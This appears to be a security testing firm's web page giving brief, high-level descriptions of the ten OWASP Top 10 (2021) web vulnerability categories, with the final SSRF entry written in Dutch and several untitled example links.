OWASP Top 10 2021

The OWASP Top 10 is an overview of the types of vulnerabilities that security experts consider most critical of web applications. It is not a ready-made checklist and does not cover all types of vulnerabilities, but it does offer a good view of this complex matter. The Top 10 therefore forms a solid basis for the security tests we offer.

Broken Access Control (A1)

Restrictions on what a user can or cannot execute within an application are in many cases not correctly enforced. Attackers can exploit these errors to access functionality and / or information without being authorized to do so.

Cryptographic Failures (A2)

Many applications and API endpoints do not sufficiently protect sensitive data. Think of personal data, documents and authorization data. Malicious ones can then steal or change them for credit card fraud, identity theft or other crimes. Sensitive data must be additionally protected by encryption or other special precautions.

Example OWASP Top-10 - A2: Cryptographic Failures

Injection (A3)

Injection vulnerabilities, such as SQL, OS command, or LDAP injection, arise when unverified data is sent by a hacker as part of a command or query. This data can execute unintended commands or provide unauthorized access to data.

Example OWASP Top-10 - A3: Injection (SQL)
Example OWASP Top-10 - A3: Injection (XSS)

Insecure Design (A4)

Applications must be designed in a secure manner to avoid errors. An insecure design cannot be solved by a perfect implementation, because by definition the necessary security controls were never created to protect against specific attacks. Already during the design process, developers should make use of threat modelling, secure design patterns and principles, as well as reference architectures.

Security Misconfiguration (A5)

Good security requires a correct configuration that is tailored to the application, frameworks, application server, web server, database server and platform. Security settings must be defined, implemented, and maintained because these standards are often insecure. In addition, all software must be up-to-date.

Example OWASP Top-10 - A5: Security Misconfiguration
Example OWASP Top-10 - A5: Security Misconfiguration (XXE)

Vulnerable & Outdated Components (A6)

Components such as libraries, frameworks and other software modules often run with full authorization. Operating a vulnerable component can result in data loss or facilitate server takeover. Components with known vulnerabilities undermine the security of the application and facilitate a variety of possible attacks.

Example OWASP Top-10 - A6: Vulnerable & Outdated Components

Identification and Authentication Failures (A7)

Authentication control and session management mechanisms are often not properly implemented, allowing attackers to assume the identity of other users.

Example OWASP Top-10 - A7: Identification & Authentication Failures

Software & Data Integrity Failures (A8)

Applications that rely on plugins, libraries, or modules from untrusted sources, repositories, and content delivery networks (CDNs) are at risk of integrity violation. An insecure CI/CD pipeline can lead to unauthorized access, malicious code or system compromise. Measures such as checking digital signatures are necessary to ensure that data comes from a trusted source and has not been modified in transit.

Security Logging & Monitoring Failures (A9)

A lack of logging and monitoring can give attackers time to delve deeper into a system and try to gain permanent access. On average, a leak is only detected after 200+ days. This gives attackers enough time to even access other systems and view, change or even delete stored data.

Server-Side Request Forgery (A10)

Het ophalen van URL’s is een veelvoorkomend scenario binnen applicaties, maar dit kan tot problemen leiden wanneer de URL’s afkomstig zijn van gebruikersinvoer. Zonder enige validatie stelt het een kwaadwillende in staat om de applicatie een verzoek te laten doen naar een onverwachte bestemming, zelfs wanneer deze wordt beschermd door een firewall, VPN of andere netwerktoegangscontroles (ACL).